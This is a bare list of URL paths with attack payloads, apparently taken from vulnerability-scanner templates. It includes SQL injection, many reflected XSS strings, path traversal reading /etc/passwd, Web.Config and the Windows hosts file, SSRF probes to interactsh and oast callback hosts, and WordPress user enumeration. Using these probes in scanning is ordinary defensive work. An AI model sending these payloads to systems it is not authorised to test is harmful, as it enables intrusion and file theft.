/api/v1/search?key=%27%20and%20extractvalue(1,concat(0x7e,%27{{rstr}}%27,0x7e))--%20a
/cms/collect/getArticle
/api/v1/getbaseconfig
/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=6wdv%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ewz8nu&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search
/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=mzbpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3eflmo8&button=Search
/api/kernels
/unsafe/plain/http://{{interactsh-url}}
/login.jsp?onlyOnePerVM=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E
/login.jsp?redirect=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E
/login.jsp?nodeid=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E
/index.jsp
/menu.jsp?flag=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E
/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E
/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E
/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E
/rest.html
/geoserver/rest.html
/js/zimbraMail/share/model/ZmSettings.js
/api/BetterImageGallery/imagehandler?path=../../../Web.Config

/etc/passwd?raw
/C:/Windows/System32/drivers/etc/hosts?raw
/etc/passwd?.svg?.wasm?init
/xwiki/bin/view/Main/?foo=bar&foo_syntax=invalid&RequiresHTMLConversion=foo&xerror=https://oast.me
/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html
/%2f%5c%2foast.pro%2f..
/?profile=</script><script>alert(document.domain)</script>
/wp-json/wp/v2/users
/wp-json/wp/v2/users?foo=simple-jwt-login
/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3Csvg+alert(document.domain)%3E
/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/loginok.html
/{{paths}}/
/?ru&filter=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/commandcenter/publicLink.do
/?cb={{cache-buster}}
/securityRealm/signup
/jenkins/securityRealm/signup
/wp-content/plugins/qwiz-online-quizzes-and-flashcards/qwiz_admin_sample_buttons.php?theme_stylesheet=\
/console/api/system-features
/bin/view/AppWithinMinutes/DeleteApplication?appName=Help.Applications.Contributors&resolve=true&xredirect=%2fbin%2fview%2fHelp%2fApplications%2fContributors%2f
/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Help.Applications.Contributors&resolve=true&xredirect=%2fbin%2fview%2fHelp%2fApplications%2fContributors%2f
/wp-json/tribe/events/v1/organizers
/wp-json/tribe/events/v1/venues
/wp-content/uploads/fifu-plugin.log
/wp-content/uploads/fifu-cloud.log
/_image?href=//{{interactsh-url}}/600x400
